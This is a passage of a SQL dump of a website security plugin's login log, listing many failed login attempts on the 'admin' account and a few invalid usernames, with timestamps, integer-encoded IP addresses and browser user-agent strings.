(101644, 1497955200.801309, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101643, 1497949054.958646, 1, 'loginFailValidUsername', 'admin', 1, 824377414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101642, 1497949053.427037, 1, 'loginFailValidUsername', 'admin', 1, 824377414, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101641, 1497948946.091042, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101640, 1497948391.592217, 1, 'loginFailValidUsername', 'admin', 1, 456859894, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101639, 1497948390.129584, 1, 'loginFailValidUsername', 'admin', 1, 456859894, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101638, 1497944722.215923, 1, 'loginFailValidUsername', 'admin', 1, 1892921625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101637, 1497941988.256931, 1, 'loginFailValidUsername', 'admin', 1, 2733940970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101636, 1497941986.859478, 1, 'loginFailValidUsername', 'admin', 1, 2733940970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101635, 1497941478.298102, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101634, 1497940682.356521, 1, 'loginFailValidUsername', 'admin', 1, 3185066879, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101633, 1497940681.039044, 1, 'loginFailValidUsername', 'admin', 1, 3185066879, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101632, 1497939979.060337, 1, 'loginFailValidUsername', 'admin', 1, 623782850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101631, 1497939977.726518, 1, 'loginFailValidUsername', 'admin', 1, 623782850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101630, 1497934846.345095, 1, 'loginFailValidUsername', 'admin', 1, 2576789288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101629, 1497934844.621558, 1, 'loginFailValidUsername', 'admin', 1, 2576789288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101628, 1497934557.279718, 1, 'loginFailValidUsername', 'admin', 1, 3411518045, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101627, 1497934555.376557, 1, 'loginFailValidUsername', 'admin', 1, 3411518045, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101626, 1497934102.292808, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101625, 1497932238.711257, 1, 'loginFailValidUsername', 'admin', 1, 1851650026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101624, 1497932237.267951, 1, 'loginFailValidUsername', 'admin', 1, 1851650026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101623, 1497927346.858767, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101622, 1497926129.637171, 1, 'loginFailValidUsername', 'admin', 1, 1733567786, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101621, 1497925775.711731, 1, 'loginFailValidUsername', 'admin', 1, 2982565155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101620, 1497925567.579673, 1, 'loginFailValidUsername', 'admin', 1, 3207991142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101619, 1497924894.199151, 1, 'loginFailValidUsername', 'admin', 1, 3188734267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101618, 1497924892.521833, 1, 'loginFailValidUsername', 'admin', 1, 3188734267, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101617, 1497924132.896087, 1, 'loginFailValidUsername', 'admin', 1, 3132336926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101616, 1497924131.041494, 1, 'loginFailValidUsername', 'admin', 1, 3132336926, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101615, 1497921904.657259, 1, 'loginFailValidUsername', 'admin', 1, 3206613788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101614, 1497921903.033998, 1, 'loginFailValidUsername', 'admin', 1, 3206613788, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101613, 1497920410.292719, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101612, 1497919538.486161, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837019, 'Mozilla/5.0 (Windows NT 5.0; rv:52.59.06) Gecko/20147688 Firefox/52.59.06'),
(101611, 1497918637.930056, 1, 'loginFailValidUsername', 'admin', 1, 2946425103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101610, 1497918262.947451, 1, 'loginFailValidUsername', 'admin', 1, 1442664703, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101609, 1497915130.773160, 1, 'loginFailValidUsername', 'admin', 1, 1378444814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101608, 1497915129.765064, 1, 'loginFailValidUsername', 'admin', 1, 1378444814, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101607, 1497914651.818608, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101606, 1497914109.219188, 1, 'loginFailValidUsername', 'admin', 1, 3036335114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101605, 1497914107.498086, 1, 'loginFailValidUsername', 'admin', 1, 3036335114, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101604, 1497909038.767959, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101603, 1497906915.361471, 1, 'loginFailValidUsername', 'admin', 1, 2172307143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101602, 1497906912.902274, 1, 'loginFailValidUsername', 'admin', 1, 2172307143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101601, 1497904286.637883, 1, 'loginFailValidUsername', 'admin', 1, 657710900, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101600, 1497904275.014534, 1, 'loginFailValidUsername', 'admin', 1, 657710900, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101599, 1497903452.907161, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101598, 1497900878.343282, 1, 'loginFailValidUsername', 'admin', 1, 3302842753, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101597, 1497900869.967022, 1, 'loginFailValidUsername', 'admin', 1, 3302842753, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101596, 1497899152.728534, 1, 'loginFailValidUsername', 'admin', 1, 1082719650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101595, 1497899151.575606, 1, 'loginFailValidUsername', 'admin', 1, 1082719650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101594, 1497898058.335024, 1, 'loginFailValidUsername', 'admin', 1, 2969046206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101593, 1497898057.375828, 1, 'loginFailValidUsername', 'admin', 1, 2969046206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101592, 1497897924.393857, 1, 'loginFailValidUsername', 'admin', 1, 3523560779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101591, 1497897922.841072, 1, 'loginFailValidUsername', 'admin', 1, 3523560779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101590, 1497897647.669914, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101589, 1497897223.824803, 1, 'loginFailValidUsername', 'admin', 1, 1451215676, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101588, 1497895651.629394, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101587, 1497895650.638165, 1, 'loginFailValidUsername', 'admin', 1, 2959119668, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101586, 1497893796.717329, 1, 'loginFailValidUsername', 'admin', 1, 3134715766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101585, 1497893795.329684, 1, 'loginFailValidUsername', 'admin', 1, 3134715766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101584, 1497892612.438210, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_58_00) AppleWebKit/534.06.69 (KHTML, like Gecko) Chrome/53.6.1894.7166 Safari/530.77 Edge/34.73456'),
(101583, 1497892071.013639, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101582, 1497892068.731566, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101581, 1497892060.014749, 1, 'loginFailValidUsername', 'admin', 1, 2536057826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101580, 1497892058.960403, 1, 'loginFailValidUsername', 'admin', 1, 2536057826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101579, 1497891320.461162, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101578, 1497890300.364106, 1, 'loginFailValidUsername', 'admin', 1, 1332056195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101577, 1497888974.366263, 1, 'loginFailValidUsername', 'admin', 1, 1546189087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101576, 1497888973.310523, 1, 'loginFailValidUsername', 'admin', 1, 1546189087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101575, 1497886873.693566, 1, 'loginFailValidUsername', 'admin', 1, 1547655939, 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0'),
(101574, 1497885149.391001, 1, 'loginFailValidUsername', 'admin', 1, 3184579739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101573, 1497885148.189889, 1, 'loginFailValidUsername', 'admin', 1, 3184579739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101572, 1497883496.565198, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101571, 1497878659.023638, 1, 'loginFailValidUsername', 'admin', 1, 702767257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101570, 1497878657.866059, 1, 'loginFailValidUsername', 'admin', 1, 702767257, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101569, 1497875007.134157, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101568, 1497874937.376640, 1, 'loginFailValidUsername', 'admin', 1, 3124507901, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101567, 1497873221.733387, 1, 'loginFailValidUsername', 'admin', 1, 2087222324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(101566, 1497873220.072275, 1, 'loginFailValidUsername', 'admin', 1, 2087222324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101565, 1497872316.290601, 1, 'loginFailValidUsername', 'admin', 1, 3400735281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101564, 1497872315.035908, 1, 'loginFailValidUsername', 'admin', 1, 3400735281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101563, 1497871252.049081, 1, 'loginFailValidUsername', 'admin', 1, 1598837055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101562, 1497871250.992216, 1, 'loginFailValidUsername', 'admin', 1, 1598837055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101561, 1497870468.439081, 1, 'loginFailValidUsername', 'admin', 1, 1730750354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101560, 1497870467.086511, 1, 'loginFailValidUsername', 'admin', 1, 1730750354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101559, 1497867333.139238, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101558, 1497863766.914280, 1, 'loginFailValidUsername', 'admin', 1, 832027457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101557, 1497863765.330435, 1, 'loginFailValidUsername', 'admin', 1, 832027457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101556, 1497863503.011135, 1, 'loginFailValidUsername', 'admin', 1, 1133349610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101555, 1497863499.718753, 1, 'loginFailValidUsername', 'admin', 1, 1133349610, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101554, 1497862850.279874, 1, 'loginFailValidUsername', 'admin', 1, 657191032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101553, 1497862848.078248, 1, 'loginFailValidUsername', 'admin', 1, 657191032, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101552, 1497862232.524739, 1, 'loginFailValidUsername', 'admin', 1, 1768588169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101551, 1497862231.278049, 1, 'loginFailValidUsername', 'admin', 1, 1768588169, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101550, 1497860855.481398, 1, 'loginFailValidUsername', 'admin', 1, 1800251650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101549, 1497860853.359739, 1, 'loginFailValidUsername', 'admin', 1, 1800251650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101548, 1497860565.172845, 1, 'loginFailValidUsername', 'admin', 1, 1330590301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101547, 1497860564.083855, 1, 'loginFailValidUsername', 'admin', 1, 1330590301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101546, 1497855076.137590, 1, 'loginFailValidUsername', 'admin', 1, 1976268809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101545, 1497855074.468349, 1, 'loginFailValidUsername', 'admin', 1, 1976268809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101544, 1497853662.954699, 1, 'loginFailValidUsername', 'admin', 1, 1301920624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101543, 1497853661.919966, 1, 'loginFailValidUsername', 'admin', 1, 1301920624, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101542, 1497852201.290922, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101541, 1497851289.517297, 1, 'loginFailValidUsername', 'admin', 1, 3414166908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101540, 1497851288.355051, 1, 'loginFailValidUsername', 'admin', 1, 3414166908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101539, 1497851093.503823, 1, 'loginFailValidUsername', 'admin', 1, 2970345110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101538, 1497848749.227761, 1, 'loginFailValidUsername', 'admin', 1, 1732021588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101537, 1497848747.653203, 1, 'loginFailValidUsername', 'admin', 1, 1732021588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101536, 1497848343.955567, 1, 'loginFailValidUsername', 'admin', 1, 827164163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101535, 1497848342.552092, 1, 'loginFailValidUsername', 'admin', 1, 827164163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101533, 1497846596.383892, 1, 'loginFailValidUsername', 'admin', 1, 1539837014, ''),
(101534, 1497846596.474711, 1, 'loginFailValidUsername', 'admin', 1, 1539837014, ''),
(101532, 1497846558.968506, 1, 'loginFailValidUsername', 'admin', 1, 1675930294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101531, 1497845621.639627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147914882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101530, 1497845620.443946, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3147914882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101529, 1497845267.783811, 1, 'loginFailValidUsername', 'admin', 1, 2970227750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101528, 1497845266.413367, 1, 'loginFailValidUsername', 'admin', 1, 2970227750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101527, 1497845227.091679, 1, 'loginFailValidUsername', 'admin', 1, 19492457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101526, 1497845225.362301, 1, 'loginFailValidUsername', 'admin', 1, 19492457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101525, 1497845015.523887, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101524, 1497843396.162174, 1, 'loginFailValidUsername', 'admin', 1, 3141660694, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101523, 1497843394.654263, 1, 'loginFailValidUsername', 'admin', 1, 3141660694, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101522, 1497841063.930601, 1, 'loginFailValidUsername', 'admin', 1, 697041447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101521, 1497841062.855561, 1, 'loginFailValidUsername', 'admin', 1, 697041447, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101520, 1497839950.928141, 1, 'loginFailValidUsername', 'admin', 1, 1333115656, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101519, 1497839949.808188, 1, 'loginFailValidUsername', 'admin', 1, 1333115656, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101518, 1497839343.853402, 1, 'loginFailValidUsername', 'admin', 1, 461624629, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101517, 1497839342.432205, 1, 'loginFailValidUsername', 'admin', 1, 461624629, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101516, 1497837904.487553, 1, 'loginFailValidUsername', 'admin', 1, 3216807797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101515, 1497837902.912663, 1, 'loginFailValidUsername', 'admin', 1, 3216807797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101514, 1497837736.879725, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101513, 1497837207.891080, 1, 'loginFailValidUsername', 'admin', 1, 2946418994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101512, 1497835043.120551, 1, 'loginFailValidUsername', 'admin', 1, 2971786226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101511, 1497835041.591195, 1, 'loginFailValidUsername', 'admin', 1, 2971786226, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101510, 1497832841.762774, 1, 'loginFailValidUsername', 'admin', 1, 2376729141, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)'),
(101509, 1497831278.966589, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101508, 1497828235.401656, 1, 'loginFailValidUsername', 'admin', 1, 1279333773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101507, 1497828234.219714, 1, 'loginFailValidUsername', 'admin', 1, 1279333773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101506, 1497827143.089936, 1, 'loginFailValidUsername', 'admin', 1, 2955645869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101505, 1497827141.810360, 1, 'loginFailValidUsername', 'admin', 1, 2955645869, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101504, 1497826570.678797, 1, 'loginFailValidUsername', 'admin', 1, 1473158061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101503, 1497826569.686256, 1, 'loginFailValidUsername', 'admin', 1, 1473158061, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101502, 1497825600.461401, 1, 'loginFailValidUsername', 'admin', 1, 1336721696, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MathPlayer 2.10b)'),
(101501, 1497825521.377228, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101500, 1497825049.165618, 1, 'loginFailValidUsername', 'admin', 1, 1700951514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101499, 1497821831.549607, 1, 'loginFailValidUsername', 'admin', 1, 1935748769, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101498, 1497821653.844921, 1, 'loginFailValidUsername', 'admin', 1, 703027240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101497, 1497819896.657672, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101496, 1497816768.236374, 1, 'loginFailValidUsername', 'admin', 1, 1377999865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101495, 1497816767.294056, 1, 'loginFailValidUsername', 'admin', 1, 1377999865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101494, 1497815067.746044, 1, 'loginFailValidUsername', 'admin', 1, 1124568033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
